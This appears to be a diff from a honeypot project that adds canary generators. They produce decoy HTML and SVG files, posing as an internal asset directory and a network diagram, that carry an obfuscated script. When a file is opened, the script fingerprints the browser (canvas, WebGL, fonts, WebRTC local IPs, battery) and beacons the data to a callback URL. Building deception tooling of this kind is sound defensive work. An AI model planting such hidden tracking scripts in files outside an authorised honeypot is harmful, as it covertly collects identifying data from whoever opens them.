ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
|
||||||
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
|
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -156,7 +162,7 @@ async def cultivate(
|
|||||||
# attribute a callback if the artifact trips during the plant
|
# attribute a callback if the artifact trips during the plant
|
||||||
# itself (improbable but possible — DOCX viewers can preview
|
# itself (improbable but possible — DOCX viewers can preview
|
||||||
# autoplay-style).
|
# autoplay-style).
|
||||||
await repo.create_canary_token({
|
token_data: dict = {
|
||||||
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
|
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
|
||||||
"decky_name": plan.decky_name,
|
"decky_name": plan.decky_name,
|
||||||
"instrumenter": None,
|
"instrumenter": None,
|
||||||
@@ -167,7 +173,10 @@ async def cultivate(
|
|||||||
"placed_at": datetime.now(timezone.utc),
|
"placed_at": datetime.now(timezone.utc),
|
||||||
"created_by": created_by,
|
"created_by": created_by,
|
||||||
"state": "planted",
|
"state": "planted",
|
||||||
})
|
}
|
||||||
|
if artifact.fingerprint_nonce is not None:
|
||||||
|
token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
|
||||||
|
await repo.create_canary_token(token_data)
|
||||||
|
|
||||||
# Carry the placement_path on the artifact so the orchestrator's
|
# Carry the placement_path on the artifact so the orchestrator's
|
||||||
# plant_file call uses it. We don't mutate the generator's
|
# plant_file call uses it. We don't mutate the generator's
|
||||||
|
|||||||
@@ -21,6 +21,8 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
|
|||||||
"honeydoc_docx",
|
"honeydoc_docx",
|
||||||
"honeydoc_pdf",
|
"honeydoc_pdf",
|
||||||
"mysql_dump",
|
"mysql_dump",
|
||||||
|
"fingerprint_html",
|
||||||
|
"fingerprint_svg",
|
||||||
)
|
)
|
||||||
|
|
||||||
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
|
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
|
||||||
@@ -64,6 +66,16 @@ def get_generator(name: str) -> CanaryGenerator:
|
|||||||
if name == "mysql_dump":
|
if name == "mysql_dump":
|
||||||
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
|
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
|
||||||
return MySQLDumpGenerator()
|
return MySQLDumpGenerator()
|
||||||
|
if name == "fingerprint_html":
|
||||||
|
from decnet.canary.generators.fingerprint_html import (
|
||||||
|
FingerprintHtmlGenerator,
|
||||||
|
)
|
||||||
|
return FingerprintHtmlGenerator()
|
||||||
|
if name == "fingerprint_svg":
|
||||||
|
from decnet.canary.generators.fingerprint_svg import (
|
||||||
|
FingerprintSvgGenerator,
|
||||||
|
)
|
||||||
|
return FingerprintSvgGenerator()
|
||||||
raise ValueError(
|
raise ValueError(
|
||||||
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
|
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
|
||||||
)
|
)
|
||||||
|
|||||||
291
decnet/canary/fingerprint_payload.js
Normal file
291
decnet/canary/fingerprint_payload.js
Normal file
@@ -0,0 +1,291 @@
|
|||||||
|
// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
|
||||||
|
// canary, harvests browser primitives, and beacons the result back to the
|
||||||
|
// canary worker. Ported from canary-self-test.html with the rendering UI
|
||||||
|
// stripped out.
|
||||||
|
//
|
||||||
|
// Three placeholders are substituted by the Python builder BEFORE
|
||||||
|
// javascript-obfuscator runs:
|
||||||
|
//
|
||||||
|
// {{BEACON_URL}} → full URL to /c/<callback_token> (no trailing slash)
|
||||||
|
// {{MINT_UUID}} → per-mint UUID, baked into the string-array post-obf
|
||||||
|
// {{MINT_NONCE}} → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
|
||||||
|
//
|
||||||
|
// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
|
||||||
|
// then a fingerprint payload sent as a base64-URL query param on a second
|
||||||
|
// GET so the existing worker records the hit even before step-4 POST
|
||||||
|
// support lands. Both fail-open: any error short-circuits to next step.
|
||||||
|
|
||||||
|
(async function () {
  // Placeholders below are substituted by the Python builder before
  // obfuscation (see the header comment of this file).
  var BEACON_URL = "{{BEACON_URL}}";
  var MINT_UUID = "{{MINT_UUID}}";
  var MINT_NONCE = "{{MINT_NONCE}}";
  var XHTML_NS = "http://www.w3.org/1999/xhtml";
  var fp = { mint: MINT_UUID };

  // Fire-and-forget GET through an image request. Failures are swallowed
  // on purpose: the payload must never surface an error to the viewer.
  function fire(url) {
    try {
      var img = new Image();
      img.src = url;
    } catch (e) { /* swallow */ }
  }

  // 1) bare-open beacon — fires regardless of whether the rest succeeds
  fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);

  // Resolve to the lowercase hex SHA-256 digest of the UTF-8 bytes of `str`.
  function sha256(str) {
    var buf = new TextEncoder().encode(str);
    return crypto.subtle.digest("SHA-256", buf).then(function (h) {
      return Array.from(new Uint8Array(h))
        .map(function (b) { return b.toString(16).padStart(2, "0"); })
        .join("");
    });
  }

  // Create a real HTMLCanvasElement in any host document. In a standalone
  // SVG (XML) document, document.createElement("canvas") produces an element
  // with a null namespace that has no getContext(); asking for the XHTML
  // namespace explicitly works in both HTML and SVG documents.
  function newCanvas() {
    return document.createElementNS(XHTML_NS, "canvas");
  }

  // navigator
  try {
    fp.nav = {
      ua: navigator.userAgent,
      pl: navigator.platform,
      lg: navigator.language,
      lgs: (navigator.languages || []).join(","),
      ck: navigator.cookieEnabled,
      dnt: navigator.doNotTrack,
      hc: navigator.hardwareConcurrency,
      dm: navigator.deviceMemory || null,
      tp: navigator.maxTouchPoints,
      wd: navigator.webdriver === true,
      pdf: navigator.pdfViewerEnabled || null,
    };
  } catch (e) { fp.nav = { err: String(e) }; }

  // screen
  try {
    fp.scr = {
      w: screen.width, h: screen.height,
      aw: screen.availWidth, ah: screen.availHeight,
      cd: screen.colorDepth, pd: screen.pixelDepth,
      dpr: window.devicePixelRatio,
      iw: window.innerWidth, ih: window.innerHeight,
      or: (screen.orientation && screen.orientation.type) || null,
    };
  } catch (e) { fp.scr = { err: String(e) }; }

  // tz / locale
  try {
    var dtf = Intl.DateTimeFormat().resolvedOptions();
    fp.tz = {
      z: dtf.timeZone, lc: dtf.locale,
      ca: dtf.calendar, ns: dtf.numberingSystem,
      off: new Date().getTimezoneOffset(),
    };
  } catch (e) { fp.tz = { err: String(e) }; }

  // connection
  try {
    var c = navigator.connection;
    fp.cn = c ? {
      t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
    } : null;
  } catch (e) { fp.cn = { err: String(e) }; }

  // canvas
  try {
    var cv = newCanvas();
    cv.width = 280; cv.height = 60;
    var ctx = cv.getContext("2d");
    // fromCodePoint, not fromCharCode: U+1F600 is outside the BMP and
    // fromCharCode would truncate it to the 16-bit code unit U+F600.
    var glyph = "c-" + String.fromCodePoint(0x1f600);
    ctx.textBaseline = "top";
    ctx.font = "14px Arial";
    ctx.fillStyle = "#f60";
    ctx.fillRect(125, 1, 62, 20);
    ctx.fillStyle = "#069";
    ctx.fillText(glyph, 2, 15);
    ctx.fillStyle = "rgba(102,204,0,0.7)";
    ctx.fillText(glyph, 4, 17);
    var dataURL = cv.toDataURL();
    fp.cv = { h: await sha256(dataURL), n: dataURL.length };
  } catch (e) { fp.cv = { err: String(e) }; }

  // webgl
  try {
    var gc = newCanvas();
    var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
    if (gl) {
      var ext = gl.getExtension("WEBGL_debug_renderer_info");
      fp.gl = {
        v: gl.getParameter(gl.VENDOR),
        r: gl.getParameter(gl.RENDERER),
        ver: gl.getParameter(gl.VERSION),
        sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
        uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
        ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
      };
    } else { fp.gl = { err: "unavailable" }; }
  } catch (e) { fp.gl = { err: String(e) }; }

  // audio
  try {
    var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
    if (ACtx) {
      var actx = new ACtx(1, 44100, 44100);
      var osc = actx.createOscillator();
      var cmp = actx.createDynamicsCompressor();
      osc.type = "triangle"; osc.frequency.value = 10000;
      cmp.threshold.value = -50; cmp.knee.value = 40;
      cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
      osc.connect(cmp); cmp.connect(actx.destination);
      osc.start(0);
      var buf = await actx.startRendering();
      var data = buf.getChannelData(0).slice(4500, 5000);
      var sum = 0;
      for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
      fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
    } else { fp.au = { err: "unavailable" }; }
  } catch (e) { fp.au = { err: String(e) }; }

  // fonts — a font counts as detected when the probe span's size with that
  // font listed first differs from its size with the generic base alone.
  try {
    var bases = ["monospace", "sans-serif", "serif"];
    var tests = [
      "Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
      "Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
      "Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
      "JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
      "Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
      "San Francisco", "Helvetica Neue", "Lucida Grande",
      "DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
      "Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
      "Noto Sans", "Noto Mono",
      "Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
      "Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
      "Malgun Gothic", "Noto Sans CJK",
      "Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
      "Bahnschrift", "Cyberpunk",
    ];
    var sp = document.createElement("span");
    sp.style.fontSize = "72px";
    sp.style.position = "absolute";
    sp.style.left = "-9999px";
    sp.innerHTML = "mmmmmmmmmmlli";
    document.body.appendChild(sp);
    var bs = {};
    for (var bi = 0; bi < bases.length; bi++) {
      sp.style.fontFamily = bases[bi];
      bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
    }
    var det = [];
    for (var ti = 0; ti < tests.length; ti++) {
      for (var bj = 0; bj < bases.length; bj++) {
        sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
        if (sp.offsetWidth !== bs[bases[bj]].w ||
            sp.offsetHeight !== bs[bases[bj]].h) {
          det.push(tests[ti]); break;
        }
      }
    }
    document.body.removeChild(sp);
    fp.ft = {
      h: await sha256(det.slice().sort().join(",")),
      n: det.length, t: tests.length, d: det,
    };
  } catch (e) { fp.ft = { err: String(e) }; }

  // webrtc local ip leak
  try {
    var ips = {}; var cands = [];
    var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
              window.mozRTCPeerConnection;
    if (RPC) {
      var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
      try {
        pc.createDataChannel("");
        pc.onicecandidate = function (e) {
          if (!e.candidate) return;
          cands.push(e.candidate.candidate);
          var m = e.candidate.candidate.match(
            /(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
          if (m) ips[m[1]] = 1;
        };
        var off = await pc.createOffer();
        await pc.setLocalDescription(off);
        // give ICE gathering a fixed 1.5 s window before reading results
        await new Promise(function (r) { setTimeout(r, 1500); });
      } finally {
        // release the connection even when offer/description setup throws
        pc.close();
      }
      fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
    } else { fp.rtc = { err: "unavailable" }; }
  } catch (e) { fp.rtc = { err: String(e) }; }

  // battery
  try {
    if (navigator.getBattery) {
      var bat = await navigator.getBattery();
      fp.bt = {
        c: bat.charging, l: bat.level,
        // Infinity is not representable in JSON, so encode it as "inf"
        ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
        dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
      };
    } else { fp.bt = { err: "unavailable" }; }
  } catch (e) { fp.bt = { err: String(e) }; }

  // perf timing jitter
  try {
    var samples = [];
    for (var pi = 0; pi < 1000; pi++) {
      var pa = performance.now();
      var x = 0;
      for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
      samples.push(performance.now() - pa);
    }
    samples.sort(function (a, b) { return a - b; });
    fp.pf = {
      med: samples[500].toFixed(4),
      p95: samples[950].toFixed(4),
      mn: samples[0].toFixed(4),
      mx: samples[999].toFixed(4),
    };
  } catch (e) { fp.pf = { err: String(e) }; }

  // permissions
  try {
    if (navigator.permissions) {
      var names = ["geolocation", "notifications", "camera", "microphone",
                   "persistent-storage", "clipboard-read", "clipboard-write"];
      var st = {};
      for (var ni = 0; ni < names.length; ni++) {
        try {
          var r = await navigator.permissions.query({ name: names[ni] });
          st[names[ni]] = r.state;
        } catch (e) { st[names[ni]] = "unsupported"; }
      }
      fp.pm = st;
    } else { fp.pm = { err: "unavailable" }; }
  } catch (e) { fp.pm = { err: String(e) }; }

  // composite identity hash — stable inputs only
  try {
    var stable = [
      fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
      fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
      fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
      fp.scr && (fp.scr.w + "x" + fp.scr.h),
    ].filter(Boolean).join("|");
    fp.id = await sha256(stable);
  } catch (e) { fp.id = { err: String(e) }; }

  // 2) ship the payload as base64url JSON on a GET query param.
  //    The current worker records the hit on /c/<slug>; step-4 worker
  //    will decode ?d= and persist the fingerprint blob.
  try {
    var json = JSON.stringify(fp);
    // encodeURIComponent + unescape turns the string into UTF-8 bytes that
    // btoa() accepts; the replaces convert base64 to unpadded base64url.
    var b64 = btoa(unescape(encodeURIComponent(json)))
      .replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
    // chunk if URL would exceed safe limit (~6KB)
    var MAX = 6000;
    if (b64.length <= MAX) {
      fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
    } else {
      var sid = (Math.random() * 1e9 | 0).toString(36);
      var total = Math.ceil(b64.length / MAX);
      for (var ci = 0; ci < total; ci++) {
        var part = b64.slice(ci * MAX, (ci + 1) * MAX);
        fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
      }
    }
  } catch (e) { /* swallow */ }
})();
|
||||||
140
decnet/canary/generators/fingerprint_html.py
Normal file
140
decnet/canary/generators/fingerprint_html.py
Normal file
@@ -0,0 +1,140 @@
|
|||||||
|
"""HTML fingerprint canary — plausible-looking page with an obfuscated
|
||||||
|
browser-fingerprinting payload inlined at the bottom of ``<body>``.
|
||||||
|
|
||||||
|
The visible content is a deliberately mundane "internal directory"
|
||||||
|
table — the kind of file a curious attacker pulls off a decky's
|
||||||
|
filesystem and opens locally to triage. When the file is opened in
|
||||||
|
*any* network-connected browser the obfuscated payload runs and beacons
|
||||||
|
to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
|
||||||
|
fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
|
||||||
|
timing jitter, permissions, composite identity hash).
|
||||||
|
|
||||||
|
Determinism: the mint UUID is derived from the callback token via
|
||||||
|
:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
|
||||||
|
output, satisfying the generator contract in :mod:`decnet.canary.base`.
|
||||||
|
The obfuscator's seed and polymorphic config bits are likewise
|
||||||
|
callback-token-derived (see :mod:`decnet.canary.obfuscator`).
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import hashlib
|
||||||
|
import uuid
|
||||||
|
|
||||||
|
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||||
|
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
|
||||||
|
|
||||||
|
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
|
||||||
|
|
||||||
|
|
||||||
|
def _mint_uuid_for(callback_token: str) -> str:
    """Return the per-mint UUID string for *callback_token*.

    The value is the version-5 UUID of the token under ``_MINT_NAMESPACE``,
    so the same token always yields the same UUID.
    """
    mint = uuid.uuid5(_MINT_NAMESPACE, callback_token)
    return str(mint)
|
||||||
|
|
||||||
|
|
||||||
|
def _stable_int(callback_token: str, salt: str = "") -> int:
|
||||||
|
"""Deterministic non-negative int derived from the callback token.
|
||||||
|
|
||||||
|
``builtins.hash`` is salted per-process — useless for a generator
|
||||||
|
that must be byte-identical across runs. SHA-256 prefix is
|
||||||
|
overkill but free.
|
||||||
|
"""
|
||||||
|
h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
|
||||||
|
return int.from_bytes(h[:4], "big")
|
||||||
|
|
||||||
|
|
||||||
|
_PAGE_TEMPLATE = """<!DOCTYPE html>
|
||||||
|
<html lang="en">
|
||||||
|
<head>
|
||||||
|
<meta charset="utf-8">
|
||||||
|
<title>Internal Asset Directory</title>
|
||||||
|
<style>
|
||||||
|
body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
|
||||||
|
margin:24px;font-size:13px}}
|
||||||
|
h1{{font-size:18px;margin:0 0 4px 0}}
|
||||||
|
.sub{{color:#777;font-size:11px;margin-bottom:18px}}
|
||||||
|
table{{border-collapse:collapse;width:100%;background:#fff;
|
||||||
|
box-shadow:0 1px 2px rgba(0,0,0,.05)}}
|
||||||
|
th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
|
||||||
|
th{{background:#f4f4f4;font-weight:600;font-size:11px;
|
||||||
|
text-transform:uppercase;letter-spacing:.5px;color:#555}}
|
||||||
|
tr:hover td{{background:#fafbff}}
|
||||||
|
.foot{{margin-top:16px;color:#999;font-size:11px}}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>Internal Asset Directory</h1>
|
||||||
|
<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
|
||||||
|
<table>
|
||||||
|
<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
|
||||||
|
{rows}
|
||||||
|
</table>
|
||||||
|
<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
|
||||||
|
<script>{payload}</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
_ROW_POOL = (
|
||||||
|
("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
|
||||||
|
("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
|
||||||
|
("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
|
||||||
|
("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
|
||||||
|
("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
|
||||||
|
("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
|
||||||
|
("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
|
||||||
|
("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
|
||||||
|
("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _build_rows(callback_token: str) -> tuple[str, int]:
    """Render the directory table rows for one mint.

    A contiguous (wrapping) window of ``_ROW_POOL`` is selected; both its
    start index and its length (5 to 8 rows) are derived from
    *callback_token* via ``_stable_int``, so the output is reproducible.

    Returns:
        ``(markup, count)``: the newline-joined ``<tr>`` elements and the
        number of rows rendered.
    """
    # Local import keeps this block self-contained. Cell text must be
    # escaped because pool entries such as "lag <1s" contain markup
    # characters that would otherwise land in the page as a raw "<".
    from html import escape

    pool_size = len(_ROW_POOL)
    start = _stable_int(callback_token, "pick") % pool_size
    count = 5 + (_stable_int(callback_token, "take") % 4)
    selected = [_ROW_POOL[(start + offset) % pool_size] for offset in range(count)]
    markup = "\n".join(
        "<tr>"
        + "".join(f"<td>{escape(cell, quote=False)}</td>" for cell in row)
        + "</tr>"
        for row in selected
    )
    return markup, len(selected)
|
||||||
|
|
||||||
|
|
||||||
|
def _sync_label(callback_token: str) -> str:
    """Build the "last sync" timestamp label shown under the page title.

    Day of month (1 to 28) and hour (0 to 23) are derived from
    *callback_token* via ``_stable_int``; year, month, minute and the
    ``UTC`` suffix are fixed text.
    """
    day_of_month = 1 + _stable_int(callback_token, "day") % 28
    hour_of_day = _stable_int(callback_token, "hour") % 24
    return f"2026-04-{day_of_month:02d} {hour_of_day:02d}:14 UTC"
|
||||||
|
|
||||||
|
|
||||||
|
class FingerprintHtmlGenerator(CanaryGenerator):
    """Generator for the HTML fingerprint canary.

    Produces the "Internal Asset Directory" page from ``_PAGE_TEMPLATE``
    with the obfuscated fingerprinting script inlined in ``<script>``.
    """

    name = "fingerprint_html"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the HTML artifact for *ctx*.

        Every variable part (mint UUID, nonce, obfuscated script, table
        rows, sync label) is derived from ``ctx.callback_token`` and
        ``ctx.http_base``. Errors raised by ``nonce_for`` or
        ``render_fingerprint_js`` are not caught here.
        """
        token = ctx.callback_token
        mint_uuid = _mint_uuid_for(token)
        nonce = nonce_for(token, mint_uuid)
        script = render_fingerprint_js(
            callback_token=token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        table_rows, n_rows = _build_rows(token)
        page = _PAGE_TEMPLATE.format(
            sync_label=_sync_label(token),
            row_count=n_rows,
            rows=table_rows,
            payload=script,
        )
        # Same URL shape the script beacons to; recorded in the notes only.
        beacon_url = f"{ctx.http_base.rstrip('/')}/c/{token}"
        artifact_notes = [
            f"obfuscated fingerprinter beacons={beacon_url}",
            f"mint_uuid={mint_uuid}",
        ]
        return CanaryArtifact(
            path="",
            content=page.encode("utf-8"),
            mode=0o644,
            # 14 days in seconds, negative; presumably backdates the file's
            # mtime. Confirm against CanaryArtifact.
            mtime_offset=-86400 * 14,
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=artifact_notes,
        )
|
||||||
88
decnet/canary/generators/fingerprint_svg.py
Normal file
88
decnet/canary/generators/fingerprint_svg.py
Normal file
@@ -0,0 +1,88 @@
|
|||||||
|
"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
|
||||||
|
that runs the obfuscated fingerprinter when the file is opened directly
|
||||||
|
in a browser.
|
||||||
|
|
||||||
|
SVG ``<script>`` only fires when the SVG is loaded as a top-level
|
||||||
|
document (or via ``<object>``/``<iframe>``); it's *blocked* when the
|
||||||
|
SVG is referenced from another page's ``<img>``. That's the right
|
||||||
|
posture for canary use: an attacker browsing the decky filesystem and
|
||||||
|
double-clicking a stray ``network_diagram.svg`` triggers it; rendering
|
||||||
|
inside a sandboxed CMS preview does not.
|
||||||
|
|
||||||
|
Same determinism guarantees as :mod:`fingerprint_html`.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||||
|
from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
|
||||||
|
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
|
||||||
|
|
||||||
|
|
||||||
|
_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
|
||||||
|
<style>
|
||||||
|
.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
|
||||||
|
.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
|
||||||
|
.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
|
||||||
|
.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
|
||||||
|
.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
|
||||||
|
</style>
|
||||||
|
<text class="title" x="20" y="28">Network Topology — {region} segment</text>
|
||||||
|
<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
|
||||||
|
<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
|
||||||
|
<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
|
||||||
|
<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
|
||||||
|
<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
|
||||||
|
<path class="edge" d="M160 105 L240 105"/>
|
||||||
|
<path class="edge" d="M360 105 L440 105"/>
|
||||||
|
<path class="edge" d="M300 130 L300 220"/>
|
||||||
|
<script type="application/ecmascript"><![CDATA[
|
||||||
|
{payload}
|
||||||
|
]]></script>
|
||||||
|
</svg>
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
|
||||||
|
|
||||||
|
|
||||||
|
class FingerprintSvgGenerator(CanaryGenerator):
    """Synthesise an SVG that fingerprints the browser opening it.

    The diagram comes from ``_DIAGRAM_TEMPLATE``; the obfuscated script is
    embedded in a ``<script>`` element inside a CDATA section.
    """

    name = "fingerprint_svg"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the SVG artifact for *ctx*.

        Region, draft version (1 to 6) and review day (1 to 28) are derived
        from ``ctx.callback_token`` via ``_stable_int``. Errors raised by
        ``nonce_for`` or ``render_fingerprint_js`` are not caught here.
        """
        mint_uuid = _mint_uuid_for(ctx.callback_token)
        nonce = nonce_for(ctx.callback_token, mint_uuid)
        payload = render_fingerprint_js(
            callback_token=ctx.callback_token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        # The template wraps the script in <![CDATA[ ... ]]>. Compact JS can
        # legitimately contain "]]>" (e.g. ``a[b[0]]>c``), which would end
        # the section early and make the SVG ill-formed. Splitting the
        # sequence across two adjacent CDATA sections leaves the script
        # text seen by the parser unchanged.
        payload = payload.replace("]]>", "]]]]><![CDATA[>")
        region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
        ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
        day = _stable_int(ctx.callback_token, "day") % 28 + 1
        body = _DIAGRAM_TEMPLATE.format(
            region=region,
            ver=ver,
            review=f"2026-03-{day:02d}",
            payload=payload,
        )
        # Same URL shape the script beacons to; recorded in the notes only.
        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o644,
            # 30 days in seconds, negative; presumably backdates the file's
            # mtime. Confirm against CanaryArtifact.
            mtime_offset=-86400 * 30,
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=[
                f"obfuscated fingerprinter beacons={beacon}",
                f"mint_uuid={mint_uuid}",
            ],
        )
|
||||||
177
decnet/canary/obfuscator.py
Normal file
177
decnet/canary/obfuscator.py
Normal file
@@ -0,0 +1,177 @@
|
|||||||
|
"""Per-mint JS obfuscator wrapper.
|
||||||
|
|
||||||
|
Thin Python wrapper around the ``javascript-obfuscator`` Node package.
|
||||||
|
Used by the fingerprint generators / instrumenters to produce a unique,
|
||||||
|
hard-to-statically-analyse JS blob per canary mint.
|
||||||
|
|
||||||
|
Two design choices flow from the canary contract in :mod:`base`:
|
||||||
|
|
||||||
|
* **Determinism.** Generators must return byte-identical artifacts for
|
||||||
|
the same ``(callback_token, http_base, dns_zone, persona)``. We
|
||||||
|
derive a numeric seed from the callback token and pass it to the
|
||||||
|
obfuscator's own ``seed`` option, and we derive the polymorphic
|
||||||
|
config bits from the same hash so a re-mint reproduces exactly.
|
||||||
|
* **Per-mint uniqueness.** Two different callback tokens produce
|
||||||
|
structurally different output: different identifier names, different
|
||||||
|
string-array rotation, optionally different transforms enabled.
|
||||||
|
|
||||||
|
The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
|
||||||
|
We pass code+options as JSON on stdin and read the obfuscated result
|
||||||
|
from stdout. Stderr surfaces obfuscator failures.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import hashlib
|
||||||
|
import hmac
|
||||||
|
import json
|
||||||
|
import os
|
||||||
|
import subprocess # nosec B404 — Node helper exec is the whole point
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
|
||||||
|
_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
|
||||||
|
|
||||||
|
# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
|
||||||
|
# specific runtime; default to PATH lookup.
|
||||||
|
